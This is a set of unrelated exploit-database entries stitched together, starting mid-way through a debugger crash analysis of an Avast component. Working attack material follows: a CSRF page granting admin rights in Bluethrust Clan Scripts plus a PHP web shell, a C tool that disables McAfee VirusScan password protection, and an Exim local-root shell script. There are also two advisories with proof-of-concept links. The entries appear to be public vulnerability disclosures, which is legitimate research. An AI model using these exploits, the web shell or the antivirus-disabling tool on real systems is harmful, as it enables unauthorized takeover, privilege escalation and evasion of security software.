740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handle a specially
crafted ExtGstate object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
########################################################################################
/*
Security Advisory @ Mediaservice.net Srl
(#01, 13/04/2016) Data Security Division
Title: McAfee VirusScan Enterprise security restrictions bypass
Application: McAfee VirusScan Enterprise 8.8 and prior versions
Platform: Microsoft Windows
Description: A local Windows administrator is able to bypass the
security restrictions and disable the antivirus engine
without knowing the correct management password
Author: Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Fixed
References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
http://lab.mediaservice.net/code/mcafee_unprotector.c
1. Abstract.
McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".
>From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.
2. Example Attack Session.
The attack can be reproduced in different ways, here are some examples.
Example 1:
Open the McAfee VirusScan Console and Sysinternals Process Explorer.
Under Process Explorer:
- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key
Go back to the McAfee Console and:
- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings
Now it is possible to stop the antivirus engine.
Example 2:
A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.
Code: http://lab.mediaservice.net/code/mcafee_unprotector.c
3. Affected Platforms.
All McAfee Viruscan Enterprise versions prior to 8.8 without SB10151 are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.
4. Fix.
On 25 February 2016, version SB10151 hotfix has been relased by McAfee,
which fixes the described vulnerability.
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
5. Proof Of Concept.
See Example Attack Session above.
6. Timeline
07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to send again vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been relased
Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.
--
Maurizio Agazzini CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via Santorelli, 15 Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY http://mediaservice.net/disclaimer
"C programmers never die. They are just cast into void"
*/
/*****************************************************************************
* *
* McAfee Data Protector "Unprotector" *
* *
* A little tool to request McAfee scan engine to disable password *
* protection. *
* *
* Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt *
* *
* This program can be compiled with MinGW (http://www.mingw.org/) *
* *
* Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved *
* Wrote by Maurizio Agazzini <inode[at]mediaservice.net> *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation; either version 2 *
* of the License, or (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place *
* Suite 330, Boston, MA 02111-1307, USA. *
* *
*****************************************************************************/
#include <stdio.h>
#include <windows.h>
HANDLE opendevice()
{
HANDLE result;
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
result = 0;
return result;
}
void main(int argc, char ** argv)
{
HKEY reg_key = NULL;
HANDLE p;
DWORD BytesReturned;
DWORD data = 0;
unsigned long size = 4;
DWORD type = REG_DWORD;
DWORD data1 = 0;
char status[4][70]= {
"No password",
"Password protection for all items listed",
"Password protection for the selected items",
"Password protection for conformance to Common Criteria"
};
printf("\n *******************************************\n");
printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
printf(" *******************************************\n\n");
/*
* The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
* disable the password protection, but you can also access to others useful
* keys.
*
* User Password
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
*
* Buffer protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
*
* Access protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
*
* On Access Scanner
* HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
*
* Others
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
*
*/
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\\Wow6432Node\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
printf("Error opening registry key...\n");
return;
}
}
// Check current status of McAfee protection
RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size);
printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]);
RegCloseKey (reg_key);
// Open McAfee magic device
p = opendevice();
printf(" [-] Please John, let me write to your registry keys...");
// Request to the scan engine to stop protect registry keys
DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
{
printf(" hmmm hmmm something went wrong!\n\n");
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
return;
}
printf(" OK\n");
data1 = 0;
if( argc > 1 )
data1 = atoi(argv[1]);
// Disable McAfee protection
if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
printf("\n hmmm hmmm something went wrong!\n");
else
printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1);
RegCloseKey (reg_key);
printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data);
// Tell to engine to take control again
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
}
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps